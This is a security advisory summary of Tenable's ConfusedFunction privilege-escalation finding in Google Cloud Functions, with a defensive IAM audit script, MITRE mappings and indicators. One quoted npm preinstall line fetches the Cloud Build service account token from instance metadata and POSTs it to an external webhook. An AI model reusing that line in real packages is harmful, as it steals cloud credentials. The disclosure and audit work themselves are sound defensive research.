[Cyware] ConfusedFunction: A Privilege Escalation Vulnerability Impacting GCP Cloud Functions

Tenable Research uncovered ConfusedFunction, a privilege-escalation vulnerability in Google Cloud Functions tied to the deployment process attaching a default Cloud Build service account with excessive permissions. Google Cloud remediated some aspects for new deployments, but existing legacy Cloud Build accounts remain vulnerable and require least-privilege replacements and ongoing monitoring. #ConfusedFunction #CloudFunctions #CloudBuild #GoogleCloudPlatform

Keypoints

  • ConfusedFunction is a privilege-escalation vulnerability in Google Cloud Platform’s Cloud Functions tied to the deployment process attaching a default Cloud Build service account with excessive permissions.
  • An attacker who can create or update a Cloud Function can escalate to the default Cloud Build service account, gaining high privileges within the project.
  • The elevated privileges can be leveraged in other GCP services created during function deployment (e.g., Cloud Storage, Artifact Registry, Container Registry).
  • Google Cloud remediated the issue for Cloud Build accounts created after mid-June 2024, but existing legacy Cloud Build instances remain vulnerable; organizations must replace them with least-privilege accounts.
  • The vulnerability underscores risks from cloud service interdependencies and IAM complexity in serverless deployments, especially when automated processes create background services.
  • Tenable demonstrates a PoC where malicious dependencies in Node.js package.json can exfiltrate the default Cloud Build service account token from instance metadata, enabling privilege escalation.
  • Google Cloud and Tenable outline remediation steps and future security enhancements, including custom service accounts for Cloud Build and organization policies to control defaults.
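The remediation the keypoints describe (replacing the legacy default Cloud Build service account with a least-privilege identity and making each function build under a custom service account) is something a defender can audit rather than take on trust. The script below is an added example, not code from Tenable or Google: it walks a project IAM policy in the JSON shape that `gcloud projects get-iam-policy PROJECT --format=json` emits, flags bindings that grant broad roles to the `<project-number>@cloudbuild.gserviceaccount.com` identity, and checks a list of function descriptions for builds still running as that default identity. The project number, role list, `buildConfig.serviceAccount` field name and sample records are assumptions constructed for the illustration.

```python
"""Audit helper for the ConfusedFunction remediation: find an over-privileged
legacy default Cloud Build service account and functions still building as it.

Added example, not Tenable's or Google's code. Inputs are constructed to mimic
`gcloud projects get-iam-policy --format=json` and a 2nd-gen function description.
"""
import json
import re

# Naming pattern of the legacy default Cloud Build service account (assumed shape).
DEFAULT_CLOUD_BUILD_SA = re.compile(
    r"^serviceAccount:(?P<project_number>\d+)@cloudbuild\.gserviceaccount\.com$"
)

# Assumed baseline of roles that exceed what a build step needs; tune this to
# your own least-privilege policy.
EXCESSIVE_ROLES = {
    "roles/owner",
    "roles/editor",
    "roles/iam.serviceAccountTokenCreator",
    "roles/iam.serviceAccountUser",
    "roles/storage.admin",
    "roles/artifactregistry.admin",
}

# Constructed sample policy: the legacy SA holds Editor and ServiceAccountUser,
# a dedicated build SA holds only a log-writer role.
SAMPLE_POLICY = {
    "bindings": [
        {"role": "roles/editor",
         "members": ["serviceAccount:123456789012@cloudbuild.gserviceaccount.com"]},
        {"role": "roles/iam.serviceAccountUser",
         "members": ["serviceAccount:123456789012@cloudbuild.gserviceaccount.com",
                     "user:dev@example.com"]},
        {"role": "roles/logging.logWriter",
         "members": ["serviceAccount:fn-build@example-project.iam.gserviceaccount.com"]},
    ]
}

# Constructed sample function descriptions; buildConfig.serviceAccount is assumed
# to be where a custom build identity is recorded (empty means the default).
SAMPLE_FUNCTIONS = [
    {"name": "projects/example-project/locations/us-central1/functions/hello",
     "buildConfig": {"serviceAccount": ""}},
    {"name": "projects/example-project/locations/us-central1/functions/orders",
     "buildConfig": {"serviceAccount":
         "projects/example-project/serviceAccounts/fn-build@example-project.iam.gserviceaccount.com"}},
]


def find_excessive_cloud_build_bindings(policy: dict) -> list[dict]:
    """Return one finding per (default Cloud Build SA, excessive role) binding."""
    findings = []
    for binding in policy.get("bindings", []):
        role = binding.get("role", "")
        if role not in EXCESSIVE_ROLES:
            continue
        for member in binding.get("members", []):
            match = DEFAULT_CLOUD_BUILD_SA.match(member)
            if match:
                findings.append({
                    "member": member,
                    "role": role,
                    "project_number": match.group("project_number"),
                })
    return findings


def functions_using_default_build_identity(functions: list[dict]) -> list[str]:
    """Return names of functions whose build still runs as the default identity."""
    flagged = []
    for fn in functions:
        build_sa = fn.get("buildConfig", {}).get("serviceAccount", "")
        if not build_sa or build_sa.endswith("@cloudbuild.gserviceaccount.com"):
            flagged.append(fn["name"])
    return flagged


def audit(policy: dict, functions: list[dict]) -> dict:
    """Combine both checks into a single report a reviewer can act on."""
    return {
        "excessive_bindings": find_excessive_cloud_build_bindings(policy),
        "functions_on_default_build_sa": functions_using_default_build_identity(functions),
    }


if __name__ == "__main__":
    print(json.dumps(audit(SAMPLE_POLICY, SAMPLE_FUNCTIONS), indent=2))
```

Running the script on the constructed samples reports two excessive bindings on the legacy account and one function (`hello`) still building as it; on real data, feed it the JSON from `gcloud projects get-iam-policy` and your function descriptions, and treat each finding as a candidate for replacement with a dedicated, minimally scoped build service account.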

MITRE Techniques

  • [T1068] Exploitation for Privilege Escalation – The attacker escalates to the default Cloud Build service account during Cloud Function deployment. “The attacker could leverage the high privileges of the default Cloud Build service account in other GCP services that are created when a Cloud Function is created or updated, including Cloud Storage, and Artifact Registry or Container Registry.”
  • [T1078] Valid Accounts – An attacker uses the deployment process to escalate privileges to a pre-existing, privileged service account. “An attacker who gains access to create or update a Cloud Function can take advantage of the function’s deployment process to escalate privileges to the default Cloud Build service account.”
  • [T1041] Exfiltration – The attacker exfiltrates tokens from the Cloud Build metadata to an external endpoint. “preinstall script… will exfiltrate the GCP token of the default Cloud Build service account from the metadata of the Cloud Build instance to your webhook.”
  • [T1552.003] Cloud Credentials – Token-based access within cloud metadata is obtained and used to impersonate cloud identities. “This code will then extract the default Cloud Build service account token… from the metadata of the Cloud Build instance.”
  • [T1195] Software Supply Chain – The attack demonstrates injecting a malicious dependency into the function’s dependencies, impacting the deployment. “The deployment process will start, and the Cloud Build will run, including the ‘npm install’ command that will install our malicious dependency.”
  • [T1059.004] Command and Scripting Interpreter – The attack relies on preinstall scripts executed during npm install to run malicious commands. "preinstall": "access_token=$(curl -H 'Metadata-Flavor: Google' 'http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/…/token');curl -X POST -d $access_token https://tenable-webhook.com"

Indicators of Compromise

  • [Domain] Internal/External domains used in the attack – metadata.google.internal, tenable-webhook.com
  • [URL] Endpoints involved in credential access and exfiltration – http://metadata.google.internal/computeMetadata/v1/instance/service-accounts//token, https://tenable-webhook.com
  • [File] Key payloads and artifacts referenced in the PoC – package.json, shell.sh, index.js

Read more: https://www.tenable.com/blog/confusedfunction-a-privilege-escalation-vulnerability-impacting-gcp-cloud-functions